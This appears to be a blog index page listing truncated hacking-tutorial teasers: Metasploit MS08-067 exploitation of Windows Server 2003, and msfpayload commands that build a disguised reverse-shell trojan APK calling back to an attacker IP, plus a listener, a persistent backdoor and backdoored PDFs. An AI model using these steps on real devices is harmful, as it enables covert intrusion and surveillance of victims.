PRINT
PRINT
SEND MAIL
SEND MAIL

How to Remotely Grab a Screenshot of Someone’s Compromised Computer

Set Up the Hack First , let’s select an exploit to use. Since he’s using a Windows Server 2003 system, I like to use the MS08_067_ netapi exploit, so let’s type: msf > use exploit/windows/smb/ms08_067_netapi To simplify our screen captures, we’ll need to use Metasploit’s Meterpreter payload. Let’s load it into...

Continue reading

How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell

Find an Exploit Now let’s search for an appropriate exploit to hack into that 2003 system. Let’s type: msf> search platform:windows type:exploit This should give us the list of exploits that we can use against Windows systems. In my Metasploit system, it returned numerous exploits as seen below. Step...

Continue reading

Hacking an Android Device with MSFvenom

Summary In this Lab, we are going to learn how you can hack an Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload and save as an apk file and setup listener to Metasploit framework. Once user/victim download and install the malicious apk then, an attacker can easily get back...

Continue reading

Hack Android Using Kali (Remotely)

Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you...

Continue reading

Create a Persistent Back Door in Android Using Kali Linux

Fire Up Kali and Hack an Android System: Use this guide to hack an android system on LAN. I’ll be hacking on WAN, using a VM. Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk Now, lets set-up a Listener: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.4...

Continue reading

How to Embed a Backdoor Connection in an Innocent-Looking PDF

The Problem Adobe has had numerous security issues with their products, including Adobe Reader, Illustrator, Flash, and others. Security vulnerabilities is partly responsible for Apple forbidding Flash from their iOS. Adobe continues to be behind the curve in security, and as a result, millions of client-side systems are vulnerable....

Continue reading

©2021 By Cyber Sec Labs

   

CONTACT US

We're not around right now. But you can send us an email and we'll get back to you, asap.

Sending

Log in with your credentials

or    

Forgot your details?

Create Account